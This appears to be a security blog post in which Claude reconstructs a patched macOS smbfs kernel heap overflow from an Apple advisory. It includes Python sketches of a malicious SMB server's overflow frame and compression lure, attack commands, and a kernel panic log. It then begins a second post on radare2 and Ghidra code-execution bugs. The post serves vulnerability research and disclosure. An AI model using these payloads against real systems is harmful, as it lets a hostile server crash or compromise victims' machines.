This time we wanted to flip it around: given nothing but a vendor advisory, can an agent reconstruct the bug and produce a working trigger? Can AI do the N-day grind so we don't have to?</p><p>We gave Claude a host running macOS 26.4, a 26.3.2 VM to bully, our Calif harness (which is first-rate duct tape around <code>ipsw</code>, <code>tart</code>, and headless IDA), and one prompt:</p><blockquote><p>we are going to try and triage and write n-day PoC exploits for the latest macOS 26.4 (which is the same as the host you are running on) here is the apple security notes - https://support.apple.com/en-us/126794 create a plan/TODO list with an item for EACH of these so we can research them one-by-one and create a list of the MOST interesting/highest impact ones to look into and then we will do deep dives on each and create exploit PoCs for each do you understand? ask any clarifying questions now</p></blockquote><p>That's it. We then went to the gym and absolutely did not spend the entire time refreshing the Claude session log on our phones.</p><h2>The vulnerability</h2><p>The macOS 26.4 <a href="https://support.apple.com/en-us/126794">security notes</a> list a few dozen CVEs across the usual lineup: WebKit, Kernel, AppleMobileFileIntegrity, CoreAudio, the gang's all here.</p><p>Claude dutifully built a TODO for each one, ranked them, and reproduced two of the SMB entries. The trigger for what we believe is CVE-2026-28835 turned out to be flaky, so this post focuses on the other one, which we believe is CVE-2026-28825:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">Available for: macOS Tahoe
Impact: An app may be able to modify protected parts of the file system
Description: An out-of-bounds write issue was addressed with improved bounds checking.
CVE-2026-28825: Sreejith Krishnan R</code></pre></div><p><em>A caveat on those CVE numbers: the advisory has several SMB entries with near-identical wording, and Apple does not tell you which line maps to which function, so our mapping from "this <code>cmp</code>/<code>b.hi</code> in <code>smb2_rq_decompress_read</code>" to "CVE-2026-28825" is best-effort. The vulnerability is real and verified against a 26.3.2 kernel.</em></p><p><em>In hindsight it's a sensible pick. "Out-of-bounds write &#8230; improved bounds checking" usually means a single inserted compare-and-branch, which is about the cleanest bindiff signal you can hope for; smbfs ships in the boot kernelcache, so both versions can be carved out with <code>ipsw</code> and diffed as a single binary rather than chased across two dyld shared caches; and SMB is a network filesystem, so whatever "an app" is doing to trigger this, a server on the other end of a socket can probably do too. The agent's initial assessment was that the PoC would amount to "a Python server," which turned out to be doing a tremendous amount of work, but we'll get there.</em></p><h2>The patch</h2><p>Claude pulled both kernelcaches and carved out the smbfs kext. If you want to follow along at home, <a href="https://github.com/blacktop/ipsw"><code>ipsw</code></a> will fetch just the kernelcache out of Apple's CDN without making you download the full multi-GB restore image:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh"># 26.3.2 is no longer signed, so use the appledb index rather than ipsw.me
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25D2140 --kernel -y -o old
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25E246  --kernel -y -o new

# carve smbfs out of each kernelcache
ipsw kernel extract old/25D2140__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o old
ipsw kernel extract new/25E246__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o new</code></pre></div><p>Then, rather than diffing every function like some kind of animal, it did what every reverser does first and diffed the strings. <code>ipsw macho info --strings</code> prefixes each line with its load address, which moves between builds, so strip that and sort before comparing:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh">diff &lt;(ipsw macho info old/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort) \
     &lt;(ipsw macho info new/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort)</code></pre></div><p>And Apple, bless them, had left a little present:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">296a297
&gt; "%s: compress_len %u &gt; originalCompressedSegmentSize %u \n"
546a548
&gt; "%s: Freeing con with unexpected state of 0x%x?"</code></pre></div><p>A brand-new error string of the form "X &gt; Y" appearing in a security update is the bindiff equivalent of a neon sign that says BUG WAS HERE. The string's only xref is inside <code>smb2_rq_decompress_read</code>, the function had grown by exactly 60 bytes between versions, and the entire delta was this:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">; macOS 26.4, smb2_rq_decompress_read +0x6d4
loc_fffffe0009b7cb9c:
    cmp   w9, w8                ; w9 = compress_len, w8 = OriginalCompressedSegmentSize
    b.hi  loc_fffffe0009b7cdec  ; &#8594; log the new string, return EBADRPC
    mov   w2, w9
    ...
    bl    _md_get_mem</code></pre></div><p>So the fix is "before copying <code>compress_len</code> bytes into a buffer, check that <code>compress_len</code> fits in the buffer," and you can probably guess what the bug is.</p><h2>The root cause</h2><p>This is where it usually gets slow for humans, because <code>smb2_rq_decompress_read</code> is ~800 instructions of nested header parsing for the SMB 3.1.1 compression transform. SMB 3.1.1 actually defines two flavours of that transform: <em>unchained</em> (<a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/0d8c3ee8-1ca6-4847-a860-50e0cdab38b2">MS-SMB2 &#167;2.2.42.1</a>), which is one header followed by one compressed blob, and <em>chained</em> (<a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/aa880fe8-ebed-4409-a474-ec6e0ca0dbcb">&#167;2.2.42.2</a>), which is one outer header followed by a list of payload chunks, each carrying its own algorithm and length so different slices of the same message can be compressed differently. Apple's parser handles both in one function, splitting on a session flag, and the bug lives in the chained branch.</p><p><em>The agent had to work out which branch was which from the disassembly alone, which meant matching the field layouts each arm parses against &#167;2.2.42.1 vs &#167;2.2.42.2 until one of them lined up. This is precisely what a human would do, minus the part where the human opens fourteen browser tabs of Microsoft Learn and emerges three hours later unsure whether the Strait of Humorz remains closed.</em></p><p>The agent's full disasm walkthrough is in <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/ANALYSIS.md">agent/ANALYSIS.md</a>; here's the fun part. 
When the smbfs client receives a frame starting with <code>\xfcSMB</code>, it parses the outer transform header and allocates a scratch buffer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">; OriginalCompressedSegmentSize from the wire &#8594; [sp+0x4c], capped only at 8 MiB
:206  lsl   w19, w8, #0x1        ; w19 = OCSS * 2
:209  bl    &lt;kalloc_data&gt;        ; alloc(2 * OCSS)   &#8592; attacker picks the zone, how thoughtful
:211  mov   x20, x0
:218  add   x23, x20, x8         ; output half = x20 + OCSS</code></pre></div><p>The buffer is <code>2 &#215; OriginalCompressedSegmentSize</code>: front half for compressed input, back half for decompressed output. <code>OriginalCompressedSegmentSize</code> comes straight off the wire with only an 8 MiB cap, which means the attacker gets to pick which kalloc zone this lands in.</p><p>Then it loops over chained payload chunks, and each chunk header has <em>two</em> attacker-controlled sizes: <code>OriginalPayloadSize</code> (how big this chunk will be <em>after</em> decompression) and <code>Length</code> (how many compressed bytes are on the wire <em>right now</em>). Watch carefully:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">:567  bl    _md_get_uint32le      ; OriginalPayloadSize &#8594; [sp+0x3c]
:585  ldr   w8, [sp, #0x3c]       ; OriginalPayloadSize
:587  sub   w9, w9, w24           ; remaining output budget
:588  cmp   w8, w9
:589  b.hi  error                 ; &#10003; decompressed size fits in output half? great!

:590  ldr   w9, [sp, #0x44]       ; Length
:591  subs  w8, w9, #0x4          ; compress_len = Length - 4
:610  mov   w2, w8                ; size = compress_len   &#8592; wait, nobody checked this one
:612  mov   x1, x20               ; dst  = the OCSS-byte input half
:614  bl    _md_get_mem           ; memcpy(heap, wire, compress_len)  &#8592; oh no</code></pre></div><p>It carefully validates that the <em>decompressed</em> size will fit in the <em>output</em> half, then copies the <em>compressed</em> bytes into the <em>input</em> half without checking them at all. The only constraint on <code>Length</code> is "are there that many bytes left in the mbuf chain?", and since we're the server, there are exactly as many bytes as we feel like sending.</p><p>So the recipe writes itself: send <code>OriginalCompressedSegmentSize = 0x100</code> to get a cute little <code>kalloc(0x200)</code> buffer, send <code>OriginalPayloadSize = 0x80</code> to pat the bouncer on the head, then send <code>Length = 0x10000</code> followed by 64 KiB of <code>0x41</code>. The <code>md_get_mem</code> happily writes <code>0xFFFC</code> bytes into a 512-byte allocation and keeps on trucking through whatever's next door.</p><h2>The catch (that wasn't)</h2><p>While tracing the dispatch path in <code>smb_iod_recvall</code>, Claude found a gate in front of the vulnerable function:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;asm&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-asm">ldr  w8, [session+0x620]   ; negotiated compression algorithm bitmap
cbz  w8, normal_parse      ; if 0, never reach smb2_rq_decompress_read</code></pre></div><p>It then went looking for what controls that field, found the <code>comp_algorithms_map</code> option in <code>nsmb.conf</code> (default <code>0</code>), and concluded the bug was only reachable if the victim had gone out of their way to enable SMB compression. That assessment is baked into <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/ANALYSIS.md"><code>agent/ANALYSIS.md</code></a>, <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/README.md"><code>agent/README.md</code></a>, and the warning <code>server.py</code> prints when the client doesn't offer a compression context. On that basis the agent wrote this up as a lab curiosity rather than something you'd worry about in the wild.</p><p><em>Hold that thought.</em></p><h2>The PoC</h2><p>The actual overflow payload, <code>build_overflow_payload()</code>, is about 25 lines. The other ~750 lines of <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/server.py"><code>server.py</code></a> are the agent slowly discovering that <code>mount_smbfs</code> is an extremely picky conversational partner. 
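</p><p>That 25-line core reduces to some struct packing. Here is our own minimal reconstruction of the chained-transform framing, based on the disassembly above and MS-SMB2 &#167;2.2.42.2; it is a sketch, not the agent's actual <code>build_overflow_payload()</code>, and the helper name is ours:</p>

```python
import struct

def build_overflow_frame() -> bytes:
    """Chained SMB2 compression transform that reaches the OOB memcpy.

    Sketch only (layout per MS-SMB2 2.2.42.2, not a copy of server.py):
    an 8-byte transform header, then one chained payload chunk whose
    Length field counts the 4-byte OriginalPayloadSize plus the
    compressed bytes, so compress_len = Length - 4.
    """
    ocss = 0x100                  # OriginalCompressedSegmentSize -> kalloc_data(0x200)
    original_payload_size = 0x80  # the only size the 26.3.2 parser checks: passes
    spray = b"\x41" * 0xFFFC      # compress_len bytes, never checked against ocss

    frame = b"\xfcSMB"                    # transform ProtocolId
    frame += struct.pack("<I", ocss)      # OriginalCompressedSegmentSize
    frame += struct.pack("<HHI",
                         0x0003,          # SMB2_COMPRESSION_LZ77_HUFFMAN
                         0x0001,          # chained-chunk flag
                         4 + len(spray))  # Length = 0x10000
    frame += struct.pack("<I", original_payload_size)
    frame += spray                        # md_get_mem copies 0xFFFC of these
    return frame
```

<p>Everything before the <code>0x41</code> spray is just enough header to get <code>md_get_mem</code> called with our length; the spray bytes are the ones that turn up in the register dump below.</p><p>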
Here is what macOS demands before it will deign to issue a READ:</p><ul><li><p><strong>Multi-protocol negotiate</strong>: an SMB1 <code>0xFF SMB</code> hello answered with an SMB2 wildcard, like it's 2006.</p></li><li><p><strong>NEGOTIATE</strong>: dialect <code>0x0311</code>, a preauth integrity context, and the compression context with <code>COMPR_FLAG_CHAINED</code> + <code>LZ77_HUFFMAN</code> that makes any of this reachable in the first place.</p></li><li><p><strong>SESSION_SETUP &#215;2</strong>: raw NTLMSSP Type-1/2/3, <em>not</em> SPNEGO-wrapped, because macOS 26 decided SPNEGO is for other people.</p></li><li><p><strong>TREE_CONNECT</strong>: <code>ShareType=DISK</code>, full access, no questions asked.</p></li><li><p><strong>Compounded CREATE/QUERY_INFO/CLOSE</strong>: mount-time probes chained via <code>NextCommand</code>, because one request at a time is for cowards.</p></li><li><p><strong>IOCTL <code>FSCTL_VALIDATE_NEGOTIATE_INFO</code></strong>: echo the negotiate parameters back so the client doesn't accuse us of MITM'ing ourselves.</p></li><li><p><strong>QUERY_DIRECTORY <code>info_class=0x25</code></strong>: a <code>FileIdBothDirectoryInformation</code> entry saying yes, there's totally a 1 MiB file here.</p></li><li><p><strong>READ</strong>: finally, <em>finally</em>, <code>build_overflow_payload()</code>.</p></li></ul><p><em>This stage is where most of the wall-clock time went, though "most" is relative: the whole thing from advisory to confirmed panic was a few hours. You can reconstruct the wall-hitting from the artifacts: the client hangs up at SESSION_SETUP because macOS sends raw NTLMSSP rather than SPNEGO, then the compounded <code>NextCommand</code> mount-time probes need handling, then QUERY_DIRECTORY turns out to want info class <code>0x25</code> (<code>FileIdBothDirectoryInformation</code>), and so on. 
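</em></p><p>The NEGOTIATE step is where the whole attack gets armed, and the lure is tiny. Here is our own sketch of the <code>SMB2_COMPRESSION_CAPABILITIES</code> context a malicious server sends back, with the layout per MS-SMB2 &#167;2.2.3.1.3; the constants are our reading of the spec, not a copy of <code>server.py</code>:</p>

```python
import struct

def compression_capabilities_context() -> bytes:
    """SMB2 negotiate context advertising chained LZ77+Huffman (sketch).

    This is the server reply that populates the client's
    server_compression_algorithms_map, the field at [session+0x620]
    that gates smb2_rq_decompress_read.
    """
    # Context data: CompressionAlgorithmCount, Padding, Flags, algorithms[]
    data = struct.pack("<HHI", 1, 0, 0x00000001)  # one algorithm, FLAG_CHAINED
    data += struct.pack("<H", 0x0003)             # SMB2_COMPRESSION_LZ77_HUFFMAN
    # Wrapper: ContextType=0x0003 (COMPRESSION_CAPABILITIES), DataLength, Reserved
    return struct.pack("<HHI", 0x0003, len(data), 0) + data
```

<p>Ten bytes of data in an eight-byte wrapper, and every <code>\xfcSMB</code> frame for the rest of the session is routed through the decompression path.</p><p><em>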
The <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/README.md#troubleshooting">troubleshooting section</a> of the agent's README and the test log at the bottom of it are basically the therapy journal.</em></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;sh&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-sh"># attacker
sudo python3 server.py --host 0.0.0.0

# victim VM
mkdir -p /tmp/m
mount_smbfs -N //guest@&lt;attacker-ip&gt;/poc /tmp/m</code></pre></div><h2>The panic</h2><p>In our testing the target panics immediately on mount; you don't even get your shell prompt back before the VM stops being a VM and starts being a very expensive paperweight.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">panic(cpu 0 caller 0xfffffe0041ad1bb8): Kernel data abort. at pc 0xfffffe0041ad858c, lr 0x19c2fe0044ad2340 (saved state: 0xfffffeab785478a0)
      x0:  0xfffffe32db26bc64 x1:  0xfffffe393878c438  x2:  0x0000000000003b74  x3:  0xfffffe32db26c000
      x4:  0x0000000000000000 x5:  0x000000000000001c  x6:  0x0000000000000041  x7:  0x0000310353f6f896
      x8:  0x4141414141414141 x9:  0x4141414141414141  x10: 0x4141414141414141  x11: 0x4141414141414141
      x12: 0x4141414141414141 x13: 0x4141414141414141  x14: 0x4141414141414141  x15: 0x4141414141414141
      x16: 0x0000000000003fb0 x17: 0x8b6bfe0045015c00  x18: 0x0000000000000000  x19: 0x000000000000fffc
      x20: 0xfffffeab78547cf0 x21: 0x0000000000000000  x22: 0xfffffe1bad1de000  x23: 0xfffffe32db26bc64
      x24: 0x0000000000003f50 x25: 0xfffffe393878c07c  x26: 0x000000000000ff98  x27: 0xfffffe00453753a0
      x28: 0xfffffe1ba74efac8 fp:  0xfffffeab78547bf0  lr:  0x19c2fe0044ad2340  sp:  0xfffffeab78547bf0
      pc:  0xfffffe0041ad858c cpsr: 0x20401208         esr: 0x0000000096000047  far: 0xfffffe32db26c000

Probabilistic GZAlloc Report:
  Zone    : data_shared.kalloc.512
  Address : 0xfffffe32db26c000
  Element : [0xfffffe32db26be00, 0xfffffe32db26c000) of size 512
  Kind    : out-of-bounds (high confidence)
  Access  : 1 byte(s) past</code></pre></div><p>That's eight general-purpose registers screaming <code>AAAAAAAA</code> in unison, <code>x19</code> still holding our <code>0xfffc</code> copy length, <code>x6</code> holding the spray byte, and PGZ politely noting an out-of-bounds write past a 512-byte element in <code>data_shared.kalloc.512</code>, which is exactly where <code>kalloc_data(2 &#215; 0x100)</code> lands.</p><h2>The human expertise</h2><p>This is where the autonomous run ended and we picked it up. The agent had handed us a working PoC with one asterisk attached: "non-default config required, victim must set <code>comp_algorithms_map</code> in <code>nsmb.conf</code>." We wanted to know how critical that asterisk really was, so we did the laziest possible experiment: deleted the <code>nsmb.conf</code> provisioning from the trigger script, pointed it at a fresh, never-configured 26.3.2 VM, and ran it.</p><p>It panicked anyway. 100% of the time.</p><p>So much for the asterisk. Conveniently, Apple publishes the SMB client source at <a href="https://github.com/apple-oss-distributions/SMBClient">apple-oss-distributions/SMBClient</a>, so we don't even have to argue from disassembly.</p><p>To be clear, "we" here still means Claude. Our contribution to this section was deleting three lines from a shell script and typing "huh, why did that work?" into a chat box. The manual source-code audit that follows, like every other piece of manual labor in this post, is the model's work; we don't read C by hand anymore, we are not farmers.</p><p>There are two places smbfs touches compression at negotiate time, and they are not symmetric:</p><ul><li><p><code>smb2_smb_add_negotiate_contexts</code> builds the client's outgoing NEGOTIATE <em>request</em>. This is where <code>comp_algorithms_map</code> matters: with the default of <code>0</code>, the client doesn't include an <code>SMB2_COMPRESSION_CAPABILITIES</code> context in what it sends. 
The agent traced this side, saw the config gate, and stopped.</p></li><li><p><code>smb2_smb_parse_negotiate_contexts</code> parses the server's NEGOTIATE <em>response</em>, and it has no such gate. From <a href="https://github.com/apple-oss-distributions/SMBClient/blob/SMBClient-538.100.12/kernel/netsmb/smb_smb_2.c#L7138-L7161">smb_smb_2.c</a>:</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">/* Get CompressionAlgorithms */
for (i = 0; i &lt; compression_algorithm_cnt; i++) {
    error = md_get_uint16le(&amp;md_context_shadow, &amp;compression_algorithm);
    ...
    switch(compression_algorithm) {
        case SMB2_COMPRESSION_LZ77_HUFFMAN:
            sessionp-&gt;server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_HUFFMAN_ENABLED;
            break;
        case SMB2_COMPRESSION_LZ77:
            sessionp-&gt;server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_ENABLED;
            break;
        ...
    }
}</code></pre></div><p>There is no intersection check against the client's own algorithm map. The client never asked for compression, the server says "we'll be using LZ77+Huffman, thanks," and the client just writes it down. (The encryption and signing arms of the same <code>switch</code> <em>do</em> validate the server's choice; compression alone does not. There is even a stale comment a few lines up reading "We do not support compression, so can ignore this reply," presumably left over from before compression support was bolted on.) From that point on <code>server_compression_algorithms_map</code>, which is the field at <code>[session+0x620]</code>, is non-zero, the dispatch gate in <code>smb_iod_recvall</code> is satisfied, and every <code>\xfcSMB</code> frame goes straight to <code>smb2_rq_decompress_read</code>.</p><h2>The Microsoft connection</h2><p>While we had the source open we also found out <em>why</em> the bug exists in the first place, and it's too good not to share. Right above the missing check, in <a href="https://github.com/apple-oss-distributions/SMBClient/blob/SMBClient-532.80.3/kernel/netsmb/smb_crypt.c#L4178-L4194">smb_crypt.c</a>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">#if 0
    /*
     * Oddly, Windows server will send a compress length that
     * is bigger than the decompressed length which will cause
     * this check to fail. Why they dont just send the non
     * compressed data?
     *
     * Sanity check the compress length
     */
    if (compress_len &gt; (originalCompressedSegmentSize - CurrentDecompressedDataSize)) {
        SMBERROR("Algorithm %d compress_len %d &gt; remaining to decompress len %d? \n", ...);
        error = EINVAL;
        goto bad;
    }
#endif</code></pre></div><p>The bounds check was there. Someone <code>#if 0</code>'d it out because Windows Server tripped it, left a slightly exasperated comment, and shipped. The 26.4 fix doesn't re-enable this block; it adds a <a href="https://github.com/apple-oss-distributions/SMBClient/blob/SMBClient-538.100.12/kernel/netsmb/smb_crypt.c#L4248-L4266">looser check further down</a> that's tight enough to stop the overflow but slack enough to keep Windows happy. (If you want to diff it yourself: vulnerable through tag <code>SMBClient-532.80.3</code>, fixed in <code>SMBClient-538.100.12</code>.)</p><p><em>We asked Claude whether it laughed when it found that comment. It claimed it "doesn't experience humor the way humans do" and then blamed Microsoft for the bug, which as Apple fanbois we found to be very relatable.</em></p><h2>Conclusion</h2><p>To be clear about scope: we didn't ask Claude to find this bug, and it didn't. Credit for the discovery goes to Sreejith Krishnan R. What we asked Claude to do was the N-day grind: take a one-line advisory and a pair of kernelcaches, reverse-engineer the fix, work out the root cause, and build something that triggers it. That part ran end to end without a human opening IDA, and the gap between "Apple ships a patch" and "someone has a working trigger" just got a lot shorter.</p><p>The reachability miss is, if anything, the more interesting result. The agent assessed this as "gated behind a config nobody sets"; in reality it's "mount any share the attacker controls," which on macOS is a single click on an <code>smb://</code> link in Finder, Safari, or Messages. That's a meaningful swing in severity, and it tells you something about where the model is today: the taint tracking, the protocol scaffolding, the eight-stage SMB state machine were flawless, and the one thing it got wrong was a judgment call about which of two sibling functions controls a gate, where it stopped one xref short of the answer. 
That's exactly the kind of gap a human reviewer closes in ten minutes once the machine has done the other ninety-five percent, which is more or less the thesis of this whole series.</p><p>Everything the agent produced lives unedited under <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/"><code>agent/</code></a> in the repo: <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/README.md"><code>README.md</code></a>, <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/ANALYSIS.md"><code>ANALYSIS.md</code></a>, <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/agent/REPORT.md"><code>REPORT.md</code></a>, plus <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/server.py"><code>server.py</code></a> at the top level. You'll see the "non-default <code>comp_algorithms_map</code> required" claim stated as fact throughout, because that's what the agent believed when it wrote them. We've left it that way on purpose; the unedited record of where it was right and where it was wrong is more useful than a cleaned-up one. The panic logs are in <a href="https://github.com/califio/publications/tree/main/MADBugs/CVE-2026-28825/panics/"><code>panics/</code></a>.</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: All Your Reverse Engineering Tools Are Belong to US]]></title><description><![CDATA[Ghidra, radare2, IDA Pro, and Binary Ninja Sidekick. If your tool doesn't show up here, it's not cool enough. 
Contact us for a free RCE.]]></description><link>https://blog.calif.io/p/mad-bugs-all-your-reverse-engineering</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-all-your-reverse-engineering</guid><pubDate>Tue, 21 Apr 2026 22:19:45 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/WxWw4dSxMCQ" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Two weeks ago we told you about how we used AI to find a <a href="https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero">radare2 0-day</a>, and the day after that, an <a href="https://blog.calif.io/p/mad-bugs-claude-found-an-auth-bypass">auth bypass in NSA&#8217;s Ghidra Server</a> that has been hiding in plain sight since 2019.</p><p>Some of you were, understandably, skeptical and unimpressed. Maybe AI got lucky.</p><p>So here are four more. All arbitrary code execution, all discovered with Claude or Codex. And if this still doesn't move you, well, it's OK. Denial is coping, we've been there.</p><h2>IDA Pro &amp; Binary Ninja Sidekick</h2><p>These two are under disclosure with Hex-Rays and Vector 35 respectively. 
We'll publish full details, PoCs, and our prompt logs when the embargoes lift.</p><p>What we <em>can</em> say:</p><ul><li><p>Both are arbitrary code execution.</p></li><li><p>Both trigger on the normal "open the thing someone sent you" workflow.</p></li></ul><div id="youtube2-WxWw4dSxMCQ" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;WxWw4dSxMCQ&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/WxWw4dSxMCQ?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><div id="youtube2-u2QaSAySqjw" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;u2QaSAySqjw&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/u2QaSAySqjw?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><h2>radare2</h2><p>When we <a href="https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero">reported the first radare2 PDB injection</a>, the fix landed the same day: base64-encode the symbol name before interpolating it into the <code>fN</code> command.</p><p>Except <code>print_gvars()</code> interpolates <em>two</em> attacker-controlled fields into RAD-mode output, and the fix only touched one of them. 
Four lines above the patched <code>fN</code> line, the raw 8-byte PE section header name still goes into the <code>f</code> command via <code>%.*s</code> with no sanitization at all:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">pdb-&gt;cb_printf ("f pdb.%s = 0x%" PFMT64x " # %d %.*s\n",
    filtered_name, ..., PDB_SIZEOF_SECTION_NAME,
    sctn_header-&gt;name);          // &lt;-- still raw from the binary</code></pre></div><p>Stick a <code>\n</code> in the section name and the <code>#</code> comment ends; whatever follows is a fresh r2 command. The catch is you only get 7 bytes per line &#8212; but a <a href="https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge">HITCON CTF 2017 "BabyFirst Revenge"</a>-style stager turns 7-byte writes into arbitrary-length <code>sh</code> execution. Two days after the first report, <a href="https://github.com/radareorg/radare2/issues/25752">#25752</a> went in and was fixed immediately.</p><p>The radare2 team turns around fixes faster than anyone else in this post. However, <strong>incomplete fixes are a bug class of their own</strong>, and AI is unreasonably good at finding them. It read the patch for #25731, asked "what <em>else</em> gets interpolated here?", and had a working PoC before we'd finished debating the merit of AI vulnerability research on X.</p><div id="youtube2-W7Jnp9AH-OU" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;W7Jnp9AH-OU&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/W7Jnp9AH-OU?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p>Write-up and PoC: <a href="https://github.com/califio/publications/tree/main/MADBugs/radare2-pdb-section-rce">https://github.com/califio/publications/tree/main/MADBugs/radare2-pdb-section-rce</a></p><h2>Ghidra</h2><p>This is NSA's tool, open-sourced in 2019, and now the default free reverse-engineering suite for most of the malware analysts, CTF players, and embedded reverse engineers who aren't paying for IDA.</p><p>This is also the one we want to spend time on, because the bug is simple 
but the exploit is genuinely fun.</p><p>Ghidra Server installs an <code>ObjectInputFilter</code> allow-list at startup so a malicious <em>client</em> can't send it deserialisation gadgets. The Ghidra <em>client</em> installs no such filter, so a malicious <em>server</em> can send the client whatever it wants. And opening a <code>.gpr</code> project file silently connects to whatever <code>ghidra://</code> URL is sitting in its <code>projectState</code> XML.</p><p>So: hand someone a Ghidra project, they double-click it, your server answers the very first RMI call (<code>reg.list()</code>, before any auth handshake) with a gadget chain instead of a <code>String[]</code>, and <code>Runtime.exec()</code> fires on their box.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;java&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-java">// ServerConnectTask.java &#8212; first thing the client does
Registry reg = LocateRegistry.getRegistry(server.getServerName(),
    server.getPortNumber(), new SslRMIClientSocketFactory());
